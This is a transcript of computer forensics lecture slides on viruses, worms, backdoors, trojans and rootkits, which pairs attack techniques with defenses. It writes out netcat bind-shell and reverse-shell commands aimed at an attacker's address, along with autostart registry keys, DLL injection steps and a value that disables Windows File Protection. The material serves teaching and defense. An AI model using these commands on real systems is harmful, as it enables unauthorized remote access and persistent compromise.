viruses, worms, mobile code
DESCRIPTION
Viruses, Worms, Mobile Code. COEN 252: Computer Forensics. Viruses: The Principle. Virus attaches itself to a host that can execute instructions contained in the virus. When the host is invoked, the virus copies itself to other locations on the system. Executables. - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/1.jpg)
Viruses, Worms, Mobile Code
COEN 252: Computer Forensics
![Page 2: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/2.jpg)
Viruses: The Principle
Virus attaches itself to a host that can execute instructions contained in the virus.
When the host is invoked, the virus copies itself to other locations on the system.
![Page 3: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/3.jpg)
Executables Companion Infection Technique
OS will call the virus when the user requests the companion file.
Windows: Virus is Notepad.com to hide as Notepad.exe. Set the hidden attribute to prevent the virus from
being seen. Launch the true notebook.exe file from the virus. If the user selects Start Run and types in
notebook, then windows starts the virus (notebook.com instead of notebook.exe)
![Page 4: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/4.jpg)
Executables
Companion Infection Technique Windows: Virus renames Notepad.exe to
Notepad.ex_ and hides it. Virus takes the place of Notepad.exe. Works with shortcuts. Used in the Trilisa virus / worm (2002)
![Page 5: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/5.jpg)
Executables
Companion Infection Technique Virus uses alternate data stream
feature of NTFS: Streams look like one file in explorer and
directory listings. System activates the default stream, the
virus. Virus calls alternate stream. Win2KStream Virus (2000)
![Page 6: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/6.jpg)
Executables Overwriting Techniques
Virus replaces part of an executable. Usually the executable looses functionality. Users will now that there is something wrong.
Prepending Techniques Virus placed in front of executable. After virus executes, host program is called. Very easy for .com files. Easy to clean files.
Bliss virus had a disinfect mode built into it. Used by the NIMDA worm.
![Page 7: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/7.jpg)
Executables Appending Infection Technique
Insert itself at the end of host file. Add a jump at the beginning of host file.
Stealth Techniques for Prepending and Appending: Compress host. When virus calls hosts, host is uncompressed
into RAM. Fill up total package (virus, compressed host)
to same size as original host. Change filler so that checksum is not
changed.
![Page 8: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/8.jpg)
Boot Sector Modification Target Master Boot Record or Partition Boot Sector. Michelangelo Virus (1991).
Replaced MBR boot strap to elsewhere on disk. First the virus loads itself into memory, then it passes control
to the original MBR boot sector. Places itself into all boot sector of all floppies. Memory-resident copy of the virus is attached to low-level
BIOS drivers. Gets called when these are executed. Can no longer spread under WinNT, Win2K, WinXP, only
wreak havoc, e.g. by overwriting the sectors right after the partition boot sector.
![Page 9: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/9.jpg)
Infection of Document Files Many software use Macros:
MS Office, WordPerfect Office, StarOffice, OpenOffice, AutoCAD, Excel, …
WinOffice runs code in subroutines Document_Open() Document_Close() AutoExec() ….
Virus can copy itself to the victim’s Normal.dot file.
Normal.dot file is processed whenever WinOffice starts.
![Page 10: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/10.jpg)
Other Targets Source Code Scripts
Visual Basic Scripts (.vbs) used by OS: Startup.vbs Exec.vbs
Shell scripts, Perl scripts Java Class Files
Platform independent viruses
![Page 11: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/11.jpg)
Propagation Techniques
Removable Storage Boot sector viruses, executable
viruses Yamaha’s CD-R drive firmware update
contained the Chernobyl virus.
Email attachments Shared directories
![Page 12: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/12.jpg)
Anti-Virus Defense
Antivirus software on gateways: User workstations File servers Mail servers Application servers Border firewalls Handhelds.
![Page 13: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/13.jpg)
Anti-Virus Defense Virus signatures
Looks for small patterns indicative of a known virus.
Polymorphic viruses Heuristics
Looks for programs with bad behavior: Attempts to access the boot sector Attempts to locate all files in a directory Attempts to write to an exe file Attempts to delete hard drive contents …
![Page 14: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/14.jpg)
Anti-Virus Defense Integrity Verification
Generate database of hashes of important files.
Recalculate these hashes and compare them to known values.
Configuration Hardening Least privilege Minimize active components. Set warnings (e.g. against macros) User education
![Page 15: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/15.jpg)
Anti-Anti-Virus Defense Stealthing
Hide virus files. Intercept scanning of infected files. Slow rate of infection. …
Polymorphism and Metamorphism Change order of instructions in virus code Use equivalent code (increment = subtracting
with -1) Encryption of most of the virus body. Slightly change functionality of virus as it
spreads.
![Page 16: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/16.jpg)
Anti-Anti-Virus Defense
Antivirus software deactivation Kill processes known to be antivirus
processes. Disable internet access to antivirus
vendor’s pages. Change security settings (e.g. allow
Word macros to run)
![Page 17: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/17.jpg)
Worms
Worms: Propagates across a network Typically, does not require user
action for propagation.Virus: Infects files. Typically requires user interaction.
![Page 18: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/18.jpg)
Worms
Worm Components Warhead Propagation Engine Target Selection Algorithm Scanning Engine Payload
![Page 19: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/19.jpg)
Worm Warhead
A piece of code that exploits a vulnerability on the target system Exploits such as Buffer Overflow
Exploits File Sharing Attacks E-mail Common Misconfigurations
![Page 20: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/20.jpg)
Worm Propagation Engine After gaining access, the worm must
transfer itself to the target machine. Some worms are completely contained
in the warhead. File Transfer Mechanisms
FTP TFTP HTTP SMB (MS Server Message Block)
Windows file sharing Unix servers running SAMBA
![Page 21: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/21.jpg)
Worm Target Selection Algorithm Once the worm has gained control
of a target, it starts looking for new targets. E-mail addresses Host lists Trusted Systems Network Neighborhood DNS queries Randomly selected ip address.
![Page 22: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/22.jpg)
Worm Scanning Engine
Once targets are identified, the worm scans for the original vulnerability.
![Page 23: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/23.jpg)
Worm Payload Some specific action done on
behalf of the attacker. Opening up a backdoor. Planting a distributed denial of
service attack. Performing complex calculations:
password cracking math research (actually happened)
![Page 24: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/24.jpg)
Worm Spread Worm spread is limited
Diversity of machines Tiny worm
targeted only machines running security software from a medium company
was successful in infecting most machines. Worms can contain support for multiple
entry methods. Too many victims crash Fast worms can cause network
congestion
![Page 25: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/25.jpg)
Worm Trends Multiplatform worms Multiexploit worms Zero-day exploit worms
No chance to patch Fast-spreading worms: Warhol / Flash
pre-scan targets Polymorphic worms
Change appearance Metamorphic worms
Change functionality
![Page 26: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/26.jpg)
Worm Defenses Ethical (?) Worms Antivirus tools Fast patching services Firewalling
Block arbitrarily outbound connections Prevents spreading
Establishment of Incident Response Capabilities
![Page 27: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/27.jpg)
Malicious Mobile Code
![Page 28: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/28.jpg)
Backdoors
Backdoor:A program that allows attackers to
bypass normal security controls on a system, gaining access to which they are not entitled.
![Page 29: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/29.jpg)
Backdoor Types
Local Escalation of Privilege Remote execution of individual
commands. Remote command-line access. Remote control of the GUI.
![Page 30: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/30.jpg)
Backdoor Installation
Attacker has compromised the system
Virus, worm, or malicious mobile code installs the backdoor.
Social engineering: Tricking the victim into installing the backdoor.
...
![Page 31: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/31.jpg)
Starting backdoors automatically
Attacker wants to maintain access to the system.
Backdoor needs to restart whenever the system restarts.
Methods are OS dependent.
![Page 32: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/32.jpg)
Starting backdoors automatically on Windows
Altering Startup Files and Folders Registry Task Scheduler
![Page 33: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/33.jpg)
Starting backdoors automatically on Windows Startup folders and files
Autostart folders for individual users and all users.
![Page 34: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/34.jpg)
Starting backdoors automatically on Windows
Use: win.ini system.ini
Modify “shell=explorer.exe” on Win9x wininit winstart.bat (Win9x) Autoexec.bat (Win9x) Config.sys (Win9x)
![Page 35: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/35.jpg)
Starting backdoors automatically on Windows Registry keys start programs on
login or reboot: HKLM\SOFTWARE\Microsoft\Windows\
CurrentVersion\ RunServicesOnce RunServices RunOnce Run RunOnceEx
![Page 36: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/36.jpg)
Starting backdoors automatically on Windows
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\
RunServicesOnce RunServices RunOnce Run RunOnceEx
![Page 37: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/37.jpg)
Starting backdoors automatically on Windows Registry keys start programs on login or
reboot: HKLM\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Winlogon\Userinit HKLM\SOFTWARE\Microsoft\Windows\
CurrentVersion\ShellServiceObjectDelayLoad HKLM\SOFTWARE\Policies\Microsoft\
Windows\System\ Scripts Explorer\Run
![Page 38: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/38.jpg)
Starting backdoors automatically on Windows Registry keys start programs on login or
reboot: HKCU\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Winlogon\Userinit HKCU\SOFTWARE\Microsoft\Windows\
CurrentVersion\ShellServiceObjectDelayLoad HKCU\SOFTWARE\Policies\Microsoft\
Windows\System\ Scripts Explorer\Run
![Page 39: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/39.jpg)
Starting backdoors automatically on Windows
Registry keys start programs on login or reboot: HKCR\Exefiles\Shell\Open\Command
Indicates programs that will be run every time another .exe is run.
![Page 40: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/40.jpg)
Starting backdoors automatically on Windows Use the task scheduler
Check scheduled tasks with autoruns from Sysinternals
![Page 41: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/41.jpg)
Starting backdoors automatically on Unix
Modifying the init daemon Modifying system and service
initialization scripts Modify the internet daemon script Change user startup scripts Schedule jobs with Cron
![Page 42: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/42.jpg)
Starting backdoors automatically on Unix
Modify the init daemon init daemon is the first process to
start. uses /etc/inittab to find other
processes that need to be started attacker merely adds line to inittab.
![Page 43: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/43.jpg)
Starting backdoors automatically on Unix Modify system and service initialization
scripts About 20+ system scripts
Located in /etc/rc.d or /etc/init.d Or merely plant a backdoor in an initialization
script for another service. E.g. ppp daemon
for PPP modem dial-up connections
inetd network daemon change /etc/inetd.conf
![Page 44: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/44.jpg)
Starting backdoors automatically on Unix
Adjust user startup scripts .login .cshrc /etc/profile .logout .xinitrc .xsession
![Page 45: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/45.jpg)
Starting backdoors automatically on Unix
Schedule jobs with Cron
![Page 46: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/46.jpg)
Backdoor Defenses
System integrity tools like tripwire
![Page 47: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/47.jpg)
Backdoor with netcat netcat compiles into executable
nc. On the victim:
nc –l –p 2000 –e cmd.exe (Windows) nc –l –p 2000 –e /bin/sh (Unix)
Sets up a listener on port 2000. On the attacker:
nc [victim address] 2222 gives command shell.
![Page 48: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/48.jpg)
Backdoor with netcat
Only works if attacker can establish a TCP connection to the port on the victim.
Firewalls can block this.
![Page 49: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/49.jpg)
Backdoor with netcat Use an open door in the firewall: Shoveling a shell
On the attacker’s machine: nc –l –p 80
netcat listener on port 80 On the victim’s machine:
nc [attacker’s address] 80 –e cmd.exe initializes outgoing connection to attacker then executes a shell
![Page 50: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/50.jpg)
Backdoor with netcat
Alternatives to netcat cryptcat Tini Q Bindshell
Md5bd UDP_Shell TCPshell Crontab-backdoor
![Page 51: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/51.jpg)
Virtual Network Computing Remote GUI tools
Virtual Network Computing (VNC) Windows Terminal Services Remote Desktop Service Citrix MetaFrame PCAnywhere Dameware Back Orifice 2000 SubSeven www.megasecurity.org
![Page 52: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/52.jpg)
Virtual Network Computing VNC server allow to shovel a shell. Can be remotely installed:
Attacker has remote shell access on victim Attacker installs copy of VNC on his machine Attacker exports the registry keys
associated with VNC to the victim Attacker moves four files to victim Attacker adds registry changes to victim
This will display a VNC installation successful message on the victim
Attacker starts VNC
![Page 53: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/53.jpg)
Defenses against Backdoor Shell Listeners
Use firewalls Filter traffic in both directions. Firewall individual machines.
Look for open ports. On the network (Nmap) Or with a trusted tool (on CD) locally.
Close unneeded ports.
![Page 54: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/54.jpg)
Backdoors without ports
ICMP backdoor ICMP messages don’t use ports. Firewalls need to let some ICMP
messages pass. ICMP messages can carry a few bytes
of payload.
![Page 55: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/55.jpg)
Backdoors without ports
ICMP backdoors: Loki 007shell ICMP Tunnel
available at www.packetstormsecurity.org for free.
![Page 56: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/56.jpg)
Non-Promiscuous Sniffing Backdoors
Sniffer in non-promiscuous mode sniffs for commands in packets destined for the local machine.
![Page 57: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/57.jpg)
Non-Promiscuous Sniffing Backdoors Cd00r
sniffs for TCP packets to ports X, Y, Z the ports are not open
syn packets to X, Y, Z: sniffer activates backdoor.
backdoor opens TCP port and shovels shell. This can be detected. Is however unnecessary with a sniffer “Future releases” will discontinue this practice. Just craft special packets instead.
when backdoor closes, port is closed.
![Page 58: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/58.jpg)
Promiscuous Sniffing Backdoors
Promiscuous sniffer can gather packets send to any machine on the same LAN segment. IP address of suspicious traffic does
not have to originate on the victim machine.
![Page 59: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/59.jpg)
Promiscuous Sniffing Backdoors
![Page 60: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/60.jpg)
Promiscuous Sniffing Backdoors
Attacker has compromised the DSN server and installed a promiscuous sniffing backdoor there.
![Page 61: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/61.jpg)
Promiscuous Sniffing Backdoor Attacker sends a
packet to the webserver at port 80.
Messages passes through the firewall.
![Page 62: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/62.jpg)
Promiscuous Sniffing Backdoor Sniffer on the DSN
server sniffs the package.
Webserver does not know what to do with a malformed request.
Firewall:
Message to webserver.
Let pass.
![Page 63: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/63.jpg)
Promiscuous Sniffing Backdoor Backdoor on DSN
reacts to packet. Sends back
message to attacker.
Spoofed return address from webserver.
Firewall lets it pass.
Firewall:
Message from webserver.
Let pass.
![Page 64: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/64.jpg)
Defenses against backdoors without ports
Backdoors still create running processes.
Backdoors still create network packets.
Backdoors might put MAC cards into promiscuous mode.
![Page 65: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/65.jpg)
Trojan Horses
a program with added functionality.
![Page 66: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/66.jpg)
Trojan Horses Hiding names
change name (of netcat, vnc, ...) play with windows suffixes
just_text.txt .exe This is ONE word with a bunch of spaces in it
Use the .shs suffix (suppressed by system) just_text.txt .shs Shell scrap object
Windows uses the suffix to decide what to do with a file.
![Page 67: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/67.jpg)
Trojan Horses Hiding names
take someone else’s name. overeager system administrators might even
remove the legitimate program thinking it might be your fake program.
windows does not let you kill program with certain names.
regardless of content csrss.exe, services.exe, smss.exe, System, System
Idle Process, winlogon.exe There might be more than one legitimate process
named winlogon or csrcc.exe
![Page 68: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/68.jpg)
Trojan Horses
Hiding names use common typos of important files
for a Trojan ifconfig instead of ipconfig.
![Page 69: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/69.jpg)
Trojan Horses Defenses
Pskill will kill any horse / process. Fport and lsof will find open
ports associated with the horse. Tripwire could find substitutes
for executables. Filter email attachments that are
executable.
![Page 70: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/70.jpg)
Wrappers Wrap malware in a good program.
A.k.a. binders, packers, exe binders, exe joiners.
AFX File Lace, Elite Wrap, Exe2vbs, PE Bundle, Perl2Exe, Saran Wrap, TOPV4, Trojan Man
Combat with Anti-virus software File System Integrity checkers (Tripwire) Posted MD5, SHA1 values of downloads
![Page 71: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/71.jpg)
Definition of Rootkit
RootkitsRootkits are Trojan horse backdoor tools that modify existing operating system software so that an attacker can keep access to and hide on a machine.
![Page 72: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/72.jpg)
Unix User Mode Rootkits
Rootkits are bundled packages consisting of: Binary replacements that provide
backdoor access. Binary replacements that hide the
attacker. Other tools for hiding Additional Odds and Ends Installation Script
![Page 73: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/73.jpg)
Unix User Mode Rootkits: LRK
Around since the early nineties. version 6 is appearing.
![Page 74: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/74.jpg)
Unix User Mode Rootkits: LRK
Around since the early nineties. version 6 is appearing.
![Page 75: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/75.jpg)
Unix User Mode Rootkits: LRK Backdoor Access:
Trojan login, rsh, ssh Altered login, rshd, sshd Same functionality, but with a special
backdoor password for “rewt” that gives root access.
Remote shell on a chosen port altered inetd, tcpd
Local privilege escalation backdoors: chfn, chsn, passwd, su
![Page 76: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/76.jpg)
Unix User Mode Rootkits: LRK
Binary Replacements that hide the attacker: Processes
ps top pidof killall crontab
![Page 77: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/77.jpg)
Unix User Mode Rootkits: LRK
Network use netstat ifconfig
Files ls find du (omits space taken by hidden
files Events
syslogd
![Page 78: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/78.jpg)
Unix User Mode Rootkits: LRK Other tools for hiding:
fix resets the MAC times of trojaned system files. pads files so that the CRC check matches the one
of the original files. zap2, wtmp
blanks out / edits information in important files: utmp, wtmp
stores data on users currently / ever logged in. btmp
stores data on bad logins. lastlog
stores data on last login for users
![Page 79: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/79.jpg)
Unix User Mode Rootkits: LRK
Goodies bindshell
creates a backdoor listener attacker connects with netcat to the
listener sniffer
linsniffer grabs IDs and passwords for ftp, telnet
![Page 80: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/80.jpg)
Unix User Mode Rootkits: LRK
LRK Installation Script makefile allows to choose
configuration No need to understand any of the
workings of LRK installs in seconds / few minutes
![Page 81: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/81.jpg)
Unix User Mode Rootkits: URK
Universal Root Kit Functions on a variety of Unix
variants Has slightly less functionality than
LRK
![Page 82: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/82.jpg)
EFS2 Manipulations RunEFS, Defiler’s toolkit foil computer
forensics investigations on a UNIX machine.
RunEFS adds pointers of good blocks to the bad
blocks inodes. stores data in them. Cornoer’s Toolkit and derivatives don’t look
at these blocks.
![Page 83: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/83.jpg)
EFS2 Manipulations Defiler’s toolkit destroys data that a
forensics tool can harvest. shred and other overwrite tools destroy data
in a block. Defiler’s toolkit destorys inode and directory
information as well. Necrofile scrubs inodes clean Klismafile overwrites directory entries associated
with deleted files. This leaves blank spots in a directory. This shows that someone used Klismafile.
![Page 84: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/84.jpg)
Windows User Mode Rootkits Windows File Protection (WFP)
Scans for changes to critical executables and libraries.
Compares digital signatures of 1700 files to a protected file
If WFP detects a change it searches for an authorized file in different locations.
WFP can be altered Windows Service Pack Installations (Update.exe) Hotfix distributions (Hotfix.exe) Windows Update Feature Windows Device Installer
![Page 85: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/85.jpg)
Windows User Mode Rootkits
Implementing user mode rootkits in windows: Use existing interfaces Overwrite file Use DLL injection and API hooking to
manipulate running processes in memory.
![Page 86: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/86.jpg)
Windows User Mode Rootkits Use existing interfaces:
FakeGINA sits between winlogon and
msgina
![Page 87: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/87.jpg)
Windows User Mode Rootkits
Windows uses Graphical Identification aNd Authentication (GINA) Windows allows system administrators to
install third party GINA tools. Windows ships with default GINA (msgina.dll)
Attacker sets registry key HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\
Winlogon
to install Fakegina Fakegina gathers passwords, passes logon credentials
to the real msgina.dll.
![Page 88: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/88.jpg)
Windows User Mode Rootkits Changing WFP Settings
WFP configuration is stored in the registry
Attacker can change system file and then
1. delete the version in DLL cache. WFP cannot find a correct version. Sends message to request system CD. Administrator might ignore message
![Page 89: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/89.jpg)
Windows User Mode Rootkits Attacker can
2. Alter the location of the Dllcache by modifying the registry.
WFP checks signatures and finds many mistakes.
Log is full of warnings.
3. Turn off WFP by changing a registry key
WFP still active until reboot. Warning message after reboot.
![Page 90: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/90.jpg)
Windows User Mode Rootkits
Attacker can 4) set the SFCDisable key to value
0xFFFFFF9D. Completely disables WFP on Win2000 No dialog warning Only a message that WFP is inactive.
Code Red II used method 4.
![Page 91: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/91.jpg)
Windows User Mode Rootkits DLL Injection
forces an exe process to accept a DLL it never requested.
Allocate space in victim process for the DLL code to occupy. (VirtualAllocEx)
Allocate space in victim process for the DLL parameters. (VirtualAllocEx)
Write name and code into the memory space of the victim process. (WriteProcessMemory)
Create a thread in the victim process (CreateRemoteThread)
Free up resources in the victim process after execution is complete.
![Page 92: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/92.jpg)
Windows User Mode Rootkits DLL Injection allows to hijack any
process Attacker must have Debug Programs right
on system. Attacker uses DLL injection by
modifying running dll that displays information on the screen.
Modified dll still calls original dll. But does not display all the data.
![Page 93: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/93.jpg)
